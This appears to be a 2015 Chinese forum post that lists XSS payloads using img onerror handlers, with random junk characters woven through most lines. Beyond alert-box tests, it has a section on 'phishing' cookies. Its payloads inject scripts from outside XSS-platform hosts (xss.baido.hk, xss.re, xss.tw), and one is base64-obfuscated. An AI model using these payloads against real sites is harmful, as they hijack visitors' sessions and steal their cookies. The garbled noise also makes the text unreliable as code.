<img src='non-exist.jpg'onerror="alert('xss')">
# ~0 d4 M$ F4 q) U- `6 v<img src=# onerror=alert(123)>
* I4 b% \: B( V+ Q* f2 u$ H. F9 t<img src=# onerror=alert(document.cookie)>2 x6 d4 N( @6 U, y1 S4 e( C) t
下面是利用平台钓cookie的& Y z+ R' _$ o2 l% i" v
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
" F6 R+ o8 N8 H$ c
$ R, B' g V. b( H/ r' m% G6 h# [
% h$ {3 f% W3 ~9 D) p+ O<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
0 e, V# q) v& R* n1 k<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>: u* W$ G% i0 K; J
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
2 T4 p+ x- k+ V* s1 ^<img src=1 onerror=jQuery.getScript("//xss.re/974")> ( w8 e$ r( N" Y- f+ _& _& y
<img src="#">! I4 s- ~( ^/ a& r# _4 j
<img src="#">
# I. p; Z8 T% U1 ~ m9 U<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
' c5 m0 t0 h* d+ H0 P2 @0 v/ u/ \<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
! |: k7 L8 u; x1 ~3 \<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>" v5 _7 Q# }# ?
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
% }8 M8 ~6 Y# M- C9 {. \; e! d<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>/ f9 s6 Y. `0 F' z
<img src=x width="0" height="0"></img>" u7 \% F# M# N! j5 {+ Q3 u
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>3 D7 S& G0 U. P& O; E
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>+ ?: g4 j) k9 x& M) n$ g; p
|
发表于 2015-10-18 14:33:54
收藏
支持
反对